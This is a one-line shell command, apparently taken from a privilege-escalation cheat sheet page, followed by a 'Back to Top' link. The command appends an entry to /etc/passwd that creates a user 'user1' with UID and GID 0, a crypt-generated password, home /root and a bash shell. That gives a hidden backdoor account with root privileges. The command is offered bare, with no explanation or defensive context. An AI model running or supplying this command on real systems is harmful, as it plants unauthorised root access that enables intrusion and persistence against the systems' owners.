echo "user1:$(perl -le 'print crypt("user1", "123")'):0:0:root:/root:/bin/bash" >> /etc/passwd
 
 
Back to Top